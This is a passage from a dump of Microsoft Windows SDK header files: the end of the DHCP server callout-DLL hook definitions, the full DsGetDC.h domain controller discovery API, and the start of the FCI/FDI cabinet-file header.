#define DHCP_DROP_INTERNAL_ERROR 0x00000003 // ooops?
#define DHCP_DROP_TIMEOUT 0x00000004 // too late, pkt is too old
#define DHCP_DROP_UNAUTH 0x00000005 // server is not authorized to run
#define DHCP_DROP_PAUSED 0x00000006 // service is paused
#define DHCP_DROP_NO_SUBNETS 0x00000007 // no subnets configured on server
#define DHCP_DROP_INVALID 0x00000008 // invalid packet or client
#define DHCP_DROP_WRONG_SERVER 0x00000009 // client in different DS enterprise
#define DHCP_DROP_NOADDRESS 0x0000000A // no address available to offer
#define DHCP_DROP_PROCESSED 0x0000000B // packet has been processed
#define DHCP_DROP_GEN_FAILURE 0x00000100 // catch-all error
#define DHCP_SEND_PACKET 0x10000000 // send the packet on wire
#define DHCP_PROB_CONFLICT 0x20000001 // address conflicted..
#define DHCP_PROB_DECLINE 0x20000002 // an addr got declined
#define DHCP_PROB_RELEASE 0x20000003 // an addr got released
#define DHCP_PROB_NACKED 0x20000004 // a client is being nacked.
#define DHCP_GIVE_ADDRESS_NEW 0x30000001 // give client a "new" address
#define DHCP_GIVE_ADDRESS_OLD 0x30000002 // renew client's "old" address
#define DHCP_CLIENT_BOOTP 0x30000003 // client is a BOOTP client
#define DHCP_CLIENT_DHCP 0x30000004 // client is a DHCP client
typedef
DWORD
(APIENTRY *LPDHCP_CONTROL)(
IN DWORD dwControlCode,
IN LPVOID lpReserved
)
/*++
Routine Description:
This routine is called whenever the DHCP Server service is
started, stopped, paused or continued as defined by the values of
the dwControlCode parameter. The lpReserved parameter is reserved
for future use and it should not be interpreted in any way. This
routine should not block.
Arguments:
dwControlCode - one of the DHCP_CONTROL_* values
lpReserved - reserved for future use.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_NEWPKT)(
IN OUT LPBYTE *Packet,
IN OUT DWORD *PacketSize,
IN DWORD IpAddress,
IN LPVOID Reserved,
IN OUT LPVOID *PktContext,
OUT LPBOOL ProcessIt
)
/*++
Routine Description:
This routine is called soon after the DHCP Server receives a
packet that it attempts to process. This routine is in the
critical path of server execution and should return very fast, as
otherwise server performance will be impacted. The Callout DLL
can modify the buffer or return a new buffer via the Packet,
PacketSize arguments. Also, if the callout DLL has internal
structures to keep track of the packet and its progress, it can
then return a context to this packet in the PktContext parameter.
This context will be passed to almost all other hooks to indicate
the packet being referred to. Also, if the Callout DLL is
planning on processing the packet or for some other reason the
DHCP server is not expected to process this packet, then it can
set the ProcessIt flag to FALSE to indicate that the packet is to
be dropped.
Arguments:
Packet - This parameter points to a character buffer that holds
the actual packet received by the DHCP Server.
PacketSize - This parameter points to a variable that holds the
size of the above buffer.
IpAddress - This parameter points to an IPV4 host order IP address
of the socket that this packet was received on.
Reserved -Reserved for future use.
PktContect - This is an opaque pointer used by the DHCP Server for
future references to this packet. It is expected that the callout
DLL will provide this pointer if it is interested in keeping track
of the packet. (See the descriptions for the hooks below for
other usage of this Context).
ProcessIt - This is a BOOL flag that the CalloutDll can set to
TRUE or reset to indicate if the DHCP Server should continue
processing this packet or not, respectively.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_DROP_SEND)(
IN OUT LPBYTE *Packet,
IN OUT DWORD *PacketSize,
IN DWORD ControlCode,
IN DWORD IpAddress,
IN LPVOID Reserved,
IN LPVOID PktContext
)
/*++
Routine Description:
This hook is called if a packet is (DropPktHook) dropped for some
reason or if the packet is completely processed. (If a packet is
dropped, the hook is called twice as it is called once again to
note that the packet has been completely processed). The callout
DLL should be prepared to handle this hook multiple times for a
packet. This routine should not block. The ControlCode parameter
defines the reasons for the packet being dropped:
* DHCP_DROP_DUPLICATE - This packet is a duplicate of another
received by the server.
* DHCP_DROP_NOMEM - Not enough memory to process the packet.
* DHCP_DROP_INTERNAL_ERROR - Unexpected nternal error occurred.
* DHCP_DROP_TIMEOUT - The packet is too old to process.
* DHCP_DROP_UNAUTH - The server is not authorized.
* DHCP_DROP_PAUSED - The server is paused.
* DHCP_DROP_NO_SUBNETS - There are no subnets configured.
* DHCP_DROP_INVALID - The packet is invalid or it came on an
invalid socket ..
* DHCP_DROP_WRONG_SERVER - The packet was sent to the wrong DHCP Server.
* DHCP_DROP_NOADDRESS - There is no address to offer.
* DHCP_DROP_PROCESSED - The packet has been processed.
* DHCP_DROP_GEN_FAILURE - An unknown error occurred.
This routine is also called right before a response is sent down
the wire (SendPktHook) and in this case the ControlCode has a
value of DHCP_SEND_PACKET.
Arguments:
Packet - This parameter points to a character buffer that holds
the packet being processed by the DHCP Server.
PacketSize - This parameter points to a variable that holds the
size of the above buffer.
ControlCode - See description for various control codes.
IpAddress - This parameter points to an IPV4 host order IP address
of the socket that this packet was received on.
Reserved - Reserved for future use.
PktContext - This parameter is the packet context that the Callout
DLL NewPkt Hook returned for this packet. This can be used to
track a packet.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_PROB)(
IN LPBYTE Packet,
IN DWORD PacketSize,
IN DWORD ControlCode,
IN DWORD IpAddress,
IN DWORD AltAddress,
IN LPVOID Reserved,
IN LPVOID PktContext
)
/*++
Routine Description:
This routine is called whenever special events occur that cause
the packet to be dropped etc. The possible ControlCodes and their
meanings are as follows:
* DHCP_PROB_CONFLICT - The address attempted to be offered
(AltAddress) is in use in the network already.
* DHCP_PROB_DECLINE - The packet was a DECLINE message for the
address specified in AltAddress.
* DHCP_PROB_RELEASE - The packet was a RELEASE message for the
address specified in AltAddress.
* DHCP_PROB_NACKED - The packet was a REQUEST message for address
specified in AltAddress and it was NACKed by the server.
This routine should not block.
Arguments:
Packet - This parameter is the buffer of the packet being
processed.
PacketSize - This is the size of the above buffer.
ControlCode - Specifies the event. See description below for
control codes and meanings.
IpAddress - IpV4 address of socket this packet was received on.
AltAddress - Request IpV4 Address or Ip address that is in
conflict.
Reserved - Reserve for future use.
PktContext - This is the context returned by the NewPkt hook for
this packet.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_GIVE_ADDRESS)(
IN LPBYTE Packet,
IN DWORD PacketSize,
IN DWORD ControlCode,
IN DWORD IpAddress,
IN DWORD AltAddress,
IN DWORD AddrType,
IN DWORD LeaseTime,
IN LPVOID Reserved,
IN LPVOID PktContext
)
/*++
Routine Description:
This routine is called when the server is about to send an ACK to
a REQUEST message. The ControlCode specifies if the address is a
totally new address or if it an renewal of an old address (with
values DHCP_GIVE_ADDRESS_NEW and DHCP_GIVE_ADDRESS_OLD
respectively). The address being offered is passed as the
AltAddress parameter and the AddrType parameter can be one of
DHCP_CLIENT_BOOTP or DHCP_CLIENT_DHCP indicating whether the
client is using BOOTP or DHCP respectively. This call should not
block.
Arguments:
Packet - This parameter is the buffer of the packet being
processed.
PacketSize - This is the size of the above buffer.
ControlCode - See description above for control codes and
meanings.
IpAddress - IpV4 address of socket this packet was received on.
AltAddress - IpV4 address being ACKed to the client.
AddrType - Is this a DHCP or BOOTP address?
LeaseTime - Lease duration being passed.
Reserved - Reserve for future use.
PktContext - This is the context returned by the NewPkt hook for
this packet.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_HANDLE_OPTIONS)(
IN LPBYTE Packet,
IN DWORD PacketSize,
IN LPVOID Reserved,
IN LPVOID PktContext,
IN OUT LPDHCP_SERVER_OPTIONS ServerOptions
)
/*++
Routine Description:
This routine can be utilized by the CalloutDLL to avoid parsing
the whole packet. The packet is parsed by the server and some
commonly used options are returned in the parsed pointers
structure (see header for definition of DHCP_SERVER_OPTIONS). The
hook is expected to make a copy of the structure pointed to by
ServerOptions if it needs it beyond this function call. This
routine may be called several times for a single packet. This
routine should not block.
Arguments:
Packet - This parameter is the buffer of the packet being
processed.
PacketSize - This is the size of the above buffer.
Reserved - Reserve for future use.
PktContext - This is the context returned by the NewPkt hook for
this packet.
ServerOptions - This parameter is the structure that contains a
bunch of pointers that represent corresponding options.
--*/
;
typedef
DWORD
(APIENTRY *LPDHCP_DELETE_CLIENT)(
IN DWORD IpAddress,
IN LPBYTE HwAddress,
IN ULONG HwAddressLength,
IN DWORD Reserved,
IN DWORD ClientType
)
/*++
Routine Description:
This routine is called before a client lease is deleted off the
active leases database. The ClientType field is currently not
provided and this should not be used. This routine should not
block.
Arguments:
IpAddress - IpV4 address of the client lease being deleted.
HwAddress - Buffer holding the Hardware address of the client (MAC).
HwAddressLength - This specifies the length of the above buffer.
Reserved - Reserved for future use.
ClientType - Reserved for future use.
--*/
;
typedef
struct _DHCP_CALLOUT_TABLE {
LPDHCP_CONTROL DhcpControlHook;
LPDHCP_NEWPKT DhcpNewPktHook;
LPDHCP_DROP_SEND DhcpPktDropHook;
LPDHCP_DROP_SEND DhcpPktSendHook;
LPDHCP_PROB DhcpAddressDelHook;
LPDHCP_GIVE_ADDRESS DhcpAddressOfferHook;
LPDHCP_HANDLE_OPTIONS DhcpHandleOptionsHook;
LPDHCP_DELETE_CLIENT DhcpDeleteClientHook;
LPVOID DhcpExtensionHook;
LPVOID DhcpReservedHook;
} DHCP_CALLOUT_TABLE, *LPDHCP_CALLOUT_TABLE;
typedef
DWORD
(APIENTRY *LPDHCP_ENTRY_POINT_FUNC) (
IN LPWSTR ChainDlls,
IN DWORD CalloutVersion,
IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl
)
/*++
Routine Description:
This is the routine that is called by the DHCP Server when it
successfully loads a DLL. If the routine succeeds, then the
DHCP Server does not attempt to load any of the DLLs specified in
the ChainDlls list of DLLs. If this function fails for some
reason, then the DHCP Server proceeds to the next DLL in the
ChainDlls structure.
Note that for version negotiation, the server may call this
routine several times until a compatible version is found.
It is expected that the entrypoint routine would walk through the
names of the dlls and attempt to load each of them and when it
succeeds in retrieving the entry point, it attempts to get the
cumulative set of hooks by repeating the above procedure (as done
by the DHCP Server).
Arguments:
ChainDlls - This is a set of DLL names in REG_MULTI_SZ format (as
returned by Registry function calls). This does not contain the
name of the current DLL itself, but only the names of all DLLs
that follow the current DLL.
CalloutVersion - This is the version that the Callout DLL is
expected to support. The current version number is 0.
CalloutTbl - This is the cumulative set of Hooks that is needed by
the current DLLs as well as all the DLLs in ChainDlls. It is the
responsibility of the current DLL to retrive the cumulative set of
Hooks and merge that with its own set of hooks and return that in
this table structure. The table structure is defined above.
--*/
;
#ifdef __cplusplus
}
#endif
#endif _CALLOUT_H_
//========================================================================
// end of file
//========================================================================
================================================
FILE: inc/DsGetDC.h
================================================
/*++ BUILD Version: 0001 // Increment this if a change has global effects
Copyright (c) 1996-1999 Microsoft Corporation
Module Name:
dsgetdc.h
Abstract:
This file contains structures, function prototypes, and definitions
for the DsGetDcName API.
Environment:
User Mode - Win32
Notes:
--*/
#ifndef _DSGETDC_
#define _DSGETDC_
#if _MSC_VER > 1000
#pragma once
#endif
#if !defined(_DSGETDCAPI_)
#define DSGETDCAPI DECLSPEC_IMPORT
#else
#define DSGETDCAPI
#endif
#ifdef __cplusplus
extern "C" {
#endif
//
// Structure definitions
//
//
// Flags to passed to DsGetDcName
//
#define DS_FORCE_REDISCOVERY 0x00000001
#define DS_DIRECTORY_SERVICE_REQUIRED 0x00000010
#define DS_DIRECTORY_SERVICE_PREFERRED 0x00000020
#define DS_GC_SERVER_REQUIRED 0x00000040
#define DS_PDC_REQUIRED 0x00000080
#define DS_BACKGROUND_ONLY 0x00000100
#define DS_IP_REQUIRED 0x00000200
#define DS_KDC_REQUIRED 0x00000400
#define DS_TIMESERV_REQUIRED 0x00000800
#define DS_WRITABLE_REQUIRED 0x00001000
#define DS_GOOD_TIMESERV_PREFERRED 0x00002000
#define DS_AVOID_SELF 0x00004000
#define DS_ONLY_LDAP_NEEDED 0x00008000
#define DS_IS_FLAT_NAME 0x00010000
#define DS_IS_DNS_NAME 0x00020000
#define DS_TRY_NEXTCLOSEST_SITE 0x00040000
#define DS_DIRECTORY_SERVICE_6_REQUIRED 0x00080000
#define DS_WEB_SERVICE_REQUIRED 0x00100000
#define DS_RETURN_DNS_NAME 0x40000000
#define DS_RETURN_FLAT_NAME 0x80000000
#define DSGETDC_VALID_FLAGS ( \
DS_FORCE_REDISCOVERY | \
DS_DIRECTORY_SERVICE_REQUIRED | \
DS_DIRECTORY_SERVICE_PREFERRED | \
DS_GC_SERVER_REQUIRED | \
DS_PDC_REQUIRED | \
DS_BACKGROUND_ONLY | \
DS_IP_REQUIRED | \
DS_KDC_REQUIRED | \
DS_TIMESERV_REQUIRED | \
DS_WRITABLE_REQUIRED | \
DS_GOOD_TIMESERV_PREFERRED | \
DS_AVOID_SELF | \
DS_ONLY_LDAP_NEEDED | \
DS_IS_FLAT_NAME | \
DS_IS_DNS_NAME | \
DS_TRY_NEXTCLOSEST_SITE | \
DS_DIRECTORY_SERVICE_6_REQUIRED | \
DS_WEB_SERVICE_REQUIRED | \
DS_RETURN_FLAT_NAME | \
DS_RETURN_DNS_NAME )
//
// Structure returned from DsGetDcName
//
typedef struct _DOMAIN_CONTROLLER_INFOA {
LPSTR DomainControllerName;
LPSTR DomainControllerAddress;
ULONG DomainControllerAddressType;
GUID DomainGuid;
LPSTR DomainName;
LPSTR DnsForestName;
ULONG Flags;
LPSTR DcSiteName;
LPSTR ClientSiteName;
} DOMAIN_CONTROLLER_INFOA, *PDOMAIN_CONTROLLER_INFOA;
typedef struct _DOMAIN_CONTROLLER_INFOW {
#ifdef MIDL_PASS
[string,unique] wchar_t *DomainControllerName;
#else // MIDL_PASS
LPWSTR DomainControllerName;
#endif // MIDL_PASS
#ifdef MIDL_PASS
[string,unique] wchar_t *DomainControllerAddress;
#else // MIDL_PASS
LPWSTR DomainControllerAddress;
#endif // MIDL_PASS
ULONG DomainControllerAddressType;
GUID DomainGuid;
#ifdef MIDL_PASS
[string,unique] wchar_t *DomainName;
#else // MIDL_PASS
LPWSTR DomainName;
#endif // MIDL_PASS
#ifdef MIDL_PASS
[string,unique] wchar_t *DnsForestName;
#else // MIDL_PASS
LPWSTR DnsForestName;
#endif // MIDL_PASS
ULONG Flags;
#ifdef MIDL_PASS
[string,unique] wchar_t *DcSiteName;
#else // MIDL_PASS
LPWSTR DcSiteName;
#endif // MIDL_PASS
#ifdef MIDL_PASS
[string,unique] wchar_t *ClientSiteName;
#else // MIDL_PASS
LPWSTR ClientSiteName;
#endif // MIDL_PASS
} DOMAIN_CONTROLLER_INFOW, *PDOMAIN_CONTROLLER_INFOW;
#ifdef UNICODE
#define DOMAIN_CONTROLLER_INFO DOMAIN_CONTROLLER_INFOW
#define PDOMAIN_CONTROLLER_INFO PDOMAIN_CONTROLLER_INFOW
#else
#define DOMAIN_CONTROLLER_INFO DOMAIN_CONTROLLER_INFOA
#define PDOMAIN_CONTROLLER_INFO PDOMAIN_CONTROLLER_INFOA
#endif // !UNICODE
//
// Values for DomainControllerAddressType
//
#define DS_INET_ADDRESS 1
#define DS_NETBIOS_ADDRESS 2
//
// Values for returned Flags
//
#define DS_PDC_FLAG 0x00000001 // DC is PDC of Domain
#define DS_GC_FLAG 0x00000004 // DC is a GC of forest
#define DS_LDAP_FLAG 0x00000008 // Server supports an LDAP server
#define DS_DS_FLAG 0x00000010 // DC supports a DS and is a Domain Controller
#define DS_KDC_FLAG 0x00000020 // DC is running KDC service
#define DS_TIMESERV_FLAG 0x00000040 // DC is running time service
#define DS_CLOSEST_FLAG 0x00000080 // DC is in closest site to client
#define DS_WRITABLE_FLAG 0x00000100 // DC has a writable DS
#define DS_GOOD_TIMESERV_FLAG 0x00000200 // DC is running time service (and has clock hardware)
#define DS_NDNC_FLAG 0x00000400 // DomainName is non-domain NC serviced by the LDAP server
#define DS_SELECT_SECRET_DOMAIN_6_FLAG 0x00000800 // DC has some secrets
#define DS_FULL_SECRET_DOMAIN_6_FLAG 0x00001000 // DC has all secrets
#define DS_WS_FLAG 0x00002000 // DC is running web service
#define DS_PING_FLAGS 0x000FFFFF // Flags returned on ping
#define DS_DNS_CONTROLLER_FLAG 0x20000000 // DomainControllerName is a DNS name
#define DS_DNS_DOMAIN_FLAG 0x40000000 // DomainName is a DNS name
#define DS_DNS_FOREST_FLAG 0x80000000 // DnsForestName is a DNS name
//
// Function Prototypes
//
DSGETDCAPI
DWORD
WINAPI
DsGetDcNameA(
IN __in_opt LPCSTR ComputerName OPTIONAL,
IN __in_opt LPCSTR DomainName OPTIONAL,
IN GUID *DomainGuid OPTIONAL,
IN __in_opt LPCSTR SiteName OPTIONAL,
IN ULONG Flags,
OUT PDOMAIN_CONTROLLER_INFOA *DomainControllerInfo
);
DSGETDCAPI
DWORD
WINAPI
DsGetDcNameW(
IN __in_opt LPCWSTR ComputerName OPTIONAL,
IN __in_opt LPCWSTR DomainName OPTIONAL,
IN GUID *DomainGuid OPTIONAL,
IN __in_opt LPCWSTR SiteName OPTIONAL,
IN ULONG Flags,
OUT PDOMAIN_CONTROLLER_INFOW *DomainControllerInfo
);
#ifdef UNICODE
#define DsGetDcName DsGetDcNameW
#else
#define DsGetDcName DsGetDcNameA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsGetSiteNameA(
IN __in_opt LPCSTR ComputerName OPTIONAL,
OUT __deref_out LPSTR *SiteName
);
DSGETDCAPI
DWORD
WINAPI
DsGetSiteNameW(
IN __in_opt LPCWSTR ComputerName OPTIONAL,
OUT __deref_out LPWSTR *SiteName
);
#ifdef UNICODE
#define DsGetSiteName DsGetSiteNameW
#else
#define DsGetSiteName DsGetSiteNameA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsValidateSubnetNameW(
__in IN LPCWSTR SubnetName
);
DSGETDCAPI
DWORD
WINAPI
DsValidateSubnetNameA(
__in IN LPCSTR SubnetName
);
#ifdef UNICODE
#define DsValidateSubnetName DsValidateSubnetNameW
#else
#define DsValidateSubnetName DsValidateSubnetNameA
#endif // !UNICODE
//
// Only include if winsock2.h has been included
//
#ifdef _WINSOCK2API_
DSGETDCAPI
DWORD
WINAPI
DsAddressToSiteNamesW(
IN __in_opt LPCWSTR ComputerName OPTIONAL,
IN DWORD EntryCount,
IN PSOCKET_ADDRESS SocketAddresses,
OUT __deref_out_ecount(EntryCount) LPWSTR **SiteNames
);
DSGETDCAPI
DWORD
WINAPI
DsAddressToSiteNamesA(
IN __in_opt LPCSTR ComputerName OPTIONAL,
IN DWORD EntryCount,
IN PSOCKET_ADDRESS SocketAddresses,
OUT __deref_out_ecount(EntryCount) LPSTR **SiteNames
);
#ifdef UNICODE
#define DsAddressToSiteNames DsAddressToSiteNamesW
#else
#define DsAddressToSiteNames DsAddressToSiteNamesA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsAddressToSiteNamesExW(
IN __in_opt LPCWSTR ComputerName OPTIONAL,
IN DWORD EntryCount,
IN PSOCKET_ADDRESS SocketAddresses,
OUT __deref_out_ecount(EntryCount) LPWSTR **SiteNames,
OUT __deref_out_ecount(EntryCount) LPWSTR **SubnetNames
);
DSGETDCAPI
DWORD
WINAPI
DsAddressToSiteNamesExA(
IN __in_opt LPCSTR ComputerName OPTIONAL,
IN DWORD EntryCount,
IN PSOCKET_ADDRESS SocketAddresses,
OUT __deref_out_ecount(EntryCount) LPSTR **SiteNames,
OUT __deref_out_ecount(EntryCount) LPSTR **SubnetNames
);
#ifdef UNICODE
#define DsAddressToSiteNamesEx DsAddressToSiteNamesExW
#else
#define DsAddressToSiteNamesEx DsAddressToSiteNamesExA
#endif // !UNICODE
#endif // _WINSOCK2API_
//
// API to enumerate trusted domains
//
typedef struct _DS_DOMAIN_TRUSTSW {
//
// Name of the trusted domain.
//
#ifdef MIDL_PASS
[string] wchar_t * NetbiosDomainName;
[string] wchar_t * DnsDomainName;
#else // MIDL_PASS
LPWSTR NetbiosDomainName;
LPWSTR DnsDomainName;
#endif // MIDL_PASS
//
// Flags defining attributes of the trust.
//
ULONG Flags;
#define DS_DOMAIN_IN_FOREST 0x0001 // Domain is a member of the forest
#define DS_DOMAIN_DIRECT_OUTBOUND 0x0002 // Domain is directly trusted
#define DS_DOMAIN_TREE_ROOT 0x0004 // Domain is root of a tree in the forest
#define DS_DOMAIN_PRIMARY 0x0008 // Domain is the primary domain of queried server
#define DS_DOMAIN_NATIVE_MODE 0x0010 // Primary domain is running in native mode
#define DS_DOMAIN_DIRECT_INBOUND 0x0020 // Domain is directly trusting
#define DS_DOMAIN_VALID_FLAGS ( \
DS_DOMAIN_IN_FOREST | \
DS_DOMAIN_DIRECT_OUTBOUND | \
DS_DOMAIN_TREE_ROOT | \
DS_DOMAIN_PRIMARY | \
DS_DOMAIN_NATIVE_MODE | \
DS_DOMAIN_DIRECT_INBOUND )
//
// Index to the domain that is the parent of this domain.
// Only defined if NETLOGON_DOMAIN_IN_FOREST is set and
// NETLOGON_DOMAIN_TREE_ROOT is not set.
//
ULONG ParentIndex;
//
// The trust type and attributes of this trust.
//
// If NETLOGON_DOMAIN_DIRECTLY_TRUSTED is not set,
// these value are infered.
//
ULONG TrustType;
ULONG TrustAttributes;
//
// The SID of the trusted domain.
//
// If NETLOGON_DOMAIN_DIRECTLY_TRUSTED is not set,
// this value will be NULL.
//
#if defined(MIDL_PASS)
PISID DomainSid;
#else
PSID DomainSid;
#endif
//
// The GUID of the trusted domain.
//
GUID DomainGuid;
} DS_DOMAIN_TRUSTSW, *PDS_DOMAIN_TRUSTSW;
//
// ANSI version of the above struct
//
typedef struct _DS_DOMAIN_TRUSTSA {
LPSTR NetbiosDomainName;
LPSTR DnsDomainName;
ULONG Flags;
ULONG ParentIndex;
ULONG TrustType;
ULONG TrustAttributes;
PSID DomainSid;
GUID DomainGuid;
} DS_DOMAIN_TRUSTSA, *PDS_DOMAIN_TRUSTSA;
#ifdef UNICODE
#define DS_DOMAIN_TRUSTS DS_DOMAIN_TRUSTSW
#define PDS_DOMAIN_TRUSTS PDS_DOMAIN_TRUSTSW
#else
#define DS_DOMAIN_TRUSTS DS_DOMAIN_TRUSTSA
#define PDS_DOMAIN_TRUSTS PDS_DOMAIN_TRUSTSA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsEnumerateDomainTrustsW (
__in_opt LPWSTR ServerName OPTIONAL,
__in ULONG Flags,
__deref_out_ecount(*DomainCount) PDS_DOMAIN_TRUSTSW *Domains,
__out PULONG DomainCount
);
DSGETDCAPI
DWORD
WINAPI
DsEnumerateDomainTrustsA (
__in_opt LPSTR ServerName OPTIONAL,
__in ULONG Flags,
__deref_out_ecount(*DomainCount) PDS_DOMAIN_TRUSTSA *Domains,
__out PULONG DomainCount
);
#ifdef UNICODE
#define DsEnumerateDomainTrusts DsEnumerateDomainTrustsW
#else
#define DsEnumerateDomainTrusts DsEnumerateDomainTrustsA
#endif // !UNICODE
//
// Only define this API if the caller has #included the pre-requisite
// ntlsa.h or ntsecapi.h
//
#if defined(_NTLSA_) || defined(_NTSECAPI_)
DSGETDCAPI
DWORD
WINAPI
DsGetForestTrustInformationW (
IN LPCWSTR ServerName OPTIONAL,
IN LPCWSTR TrustedDomainName OPTIONAL,
IN DWORD Flags,
OUT PLSA_FOREST_TRUST_INFORMATION *ForestTrustInfo
);
#define DS_GFTI_UPDATE_TDO 0x1 // Update TDO with information returned
#define DS_GFTI_VALID_FLAGS 0x1 // All valid flags to DsGetForestTrustInformation
DSGETDCAPI
DWORD
WINAPI
DsMergeForestTrustInformationW(
IN LPCWSTR DomainName,
IN PLSA_FOREST_TRUST_INFORMATION NewForestTrustInfo,
IN PLSA_FOREST_TRUST_INFORMATION OldForestTrustInfo OPTIONAL,
OUT PLSA_FOREST_TRUST_INFORMATION *MergedForestTrustInfo
);
#endif // _NTLSA_ || _NTSECAPI_
DSGETDCAPI
DWORD
WINAPI
DsGetDcSiteCoverageW(
IN __in_opt LPCWSTR ServerName OPTIONAL,
OUT PULONG EntryCount,
OUT __deref_out_ecount(*EntryCount) LPWSTR **SiteNames
);
DSGETDCAPI
DWORD
WINAPI
DsGetDcSiteCoverageA(
IN __in_opt LPCSTR ServerName OPTIONAL,
OUT PULONG EntryCount,
OUT __deref_out_ecount(*EntryCount) LPSTR **SiteNames
);
#ifdef UNICODE
#define DsGetDcSiteCoverage DsGetDcSiteCoverageW
#else
#define DsGetDcSiteCoverage DsGetDcSiteCoverageA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsDeregisterDnsHostRecordsW (
__in_opt LPWSTR ServerName OPTIONAL,
__in_opt LPWSTR DnsDomainName OPTIONAL,
__in_opt GUID *DomainGuid OPTIONAL,
__in_opt GUID *DsaGuid OPTIONAL,
__in LPWSTR DnsHostName
);
DSGETDCAPI
DWORD
WINAPI
DsDeregisterDnsHostRecordsA (
__in_opt LPSTR ServerName OPTIONAL,
__in_opt LPSTR DnsDomainName OPTIONAL,
__in_opt GUID *DomainGuid OPTIONAL,
__in_opt GUID *DsaGuid OPTIONAL,
__in LPSTR DnsHostName
);
#ifdef UNICODE
#define DsDeregisterDnsHostRecords DsDeregisterDnsHostRecordsW
#else
#define DsDeregisterDnsHostRecords DsDeregisterDnsHostRecordsA
#endif // !UNICODE
#ifdef _WINSOCK2API_ // DsGetDcOpen/Next/Close depend on winsock2.h be included
//
// Option flags passed to DsGetDcOpen
//
#define DS_ONLY_DO_SITE_NAME 0x01 // Non-site specific names should be avoided.
#define DS_NOTIFY_AFTER_SITE_RECORDS 0x02 // Return ERROR_FILEMARK_DETECTED after all
// site specific records have been processed.
#define DS_OPEN_VALID_OPTION_FLAGS ( DS_ONLY_DO_SITE_NAME | DS_NOTIFY_AFTER_SITE_RECORDS )
//
// Valid DcFlags for DsGetDcOpen
//
#define DS_OPEN_VALID_FLAGS ( \
DS_FORCE_REDISCOVERY | \
DS_ONLY_LDAP_NEEDED | \
DS_KDC_REQUIRED | \
DS_PDC_REQUIRED | \
DS_GC_SERVER_REQUIRED | \
DS_WRITABLE_REQUIRED )
DSGETDCAPI
DWORD
WINAPI
DsGetDcOpenW(
IN LPCWSTR DnsName,
IN ULONG OptionFlags,
IN LPCWSTR SiteName OPTIONAL,
IN GUID *DomainGuid OPTIONAL,
IN LPCWSTR DnsForestName OPTIONAL,
IN ULONG DcFlags,
OUT PHANDLE RetGetDcContext
);
DSGETDCAPI
DWORD
WINAPI
DsGetDcOpenA(
IN LPCSTR DnsName,
IN ULONG OptionFlags,
IN LPCSTR SiteName OPTIONAL,
IN GUID *DomainGuid OPTIONAL,
IN LPCSTR DnsForestName OPTIONAL,
IN ULONG DcFlags,
OUT PHANDLE RetGetDcContext
);
#ifdef UNICODE
#define DsGetDcOpen DsGetDcOpenW
#else
#define DsGetDcOpen DsGetDcOpenA
#endif // !UNICODE
DSGETDCAPI
DWORD
WINAPI
DsGetDcNextW(
IN HANDLE GetDcContextHandle,
OUT PULONG SockAddressCount OPTIONAL,
OUT LPSOCKET_ADDRESS *SockAddresses OPTIONAL,
OUT __deref_opt_out LPWSTR *DnsHostName OPTIONAL
);
DSGETDCAPI
DWORD
WINAPI
DsGetDcNextA(
IN HANDLE GetDcContextHandle,
OUT PULONG SockAddressCount OPTIONAL,
OUT LPSOCKET_ADDRESS *SockAddresses OPTIONAL,
OUT __deref_opt_out LPSTR *DnsHostName OPTIONAL
);
#ifdef UNICODE
#define DsGetDcNext DsGetDcNextW
#else
#define DsGetDcNext DsGetDcNextA
#endif // !UNICODE
DSGETDCAPI
VOID
WINAPI
DsGetDcCloseW(
IN HANDLE GetDcContextHandle
);
#ifdef UNICODE
#define DsGetDcClose DsGetDcCloseW
#else
#define DsGetDcClose DsGetDcCloseW // same for ANSI
#endif // !UNICODE
#endif // _WINSOCK2API_
#ifdef __cplusplus
}
#endif
#endif // _DSGETDC_
================================================
FILE: inc/Fci.h
================================================
/*** types.h - Common defines for FCI/FDI stuff -- goes into FCI/FDI.H
*
* Copyright (C) Microsoft Corporation
* All Rights Reserved.
*
*/
#ifndef INCLUDED_TYPES_FCI_FDI
#define INCLUDED_TYPES_FCI_FDI 1
#ifdef __cplusplus
extern "C" { /* Assume C declarations for C++ */
#endif /* __cplusplus */
//** Define away for 32-bit build
#ifndef HUGE
#define HUGE
#endif
#ifndef FAR
#define FAR
#endif
#ifndef DIAMONDAPI
#define DIAMONDAPI __cdecl
#endif
//** Specify structure packing explicitly for clients of FDI
#ifndef _WIN64
#include <pshpack4.h>
#endif
//** Don't redefine types defined in Win16 WINDOWS.H (_INC_WINDOWS)
// or Win32 WINDOWS.H (_WINDOWS_)
//
#if !defined(_INC_WINDOWS) && !defined(_WINDOWS_)
typedef int BOOL; /* f */
typedef unsigned char BYTE; /* b */
typedef unsigned int UINT; /* ui */
typedef unsigned short USHORT; /* us */
typedef unsigned long ULONG; /* ul */
#endif // _INC_WINDOWS
typedef unsigned long CHECKSUM; /* csum */
typedef unsigned long UOFF; /* uoff - uncompressed offset */
typedef unsigned long COFF; /* coff - cabinet file offset */
#ifndef TRUE
#define TRUE 1
#endif
#ifndef FALSE
#define FALSE 0
#endif
#ifndef NULL
#define NULL 0
#endif
/*** ERF - Error structure
*
* This structure returns error information from FCI/FDI. The caller should
* not modify this structure.
*/
typedef struct {
int erfOper; // FCI/FDI error code -- see FDIERROR_XXX
// and FCIERR_XXX equates for details.
int erfType; // Optional error value filled in by FCI/FDI.
// For FCI, this is usually the C run-time
// *errno* value.
BOOL fError; // TRUE => error present
} ERF; /* erf */
typedef ERF FAR *PERF; /* perf */
#ifdef _DEBUG
// don't hide statics from map during debugging
#define STATIC
#else // !DEBUG
#define STATIC static
#endif // !DEBUG
#define CB_MAX_CHUNK 32768U
#define CB_MAX_DISK 0x7fffffffL
#define CB_MAX_FILENAME 256
#define CB_MAX_CABINET_NAME 256
#define CB_MAX_CAB_PATH 256
#define CB_MAX_DISK_NAME 256
/*** tcompXXX - Diamond compression types
*
* These are passed to FCIAddFile(), and are also stored in the CFFOLDER
* structures in cabinet files.
*
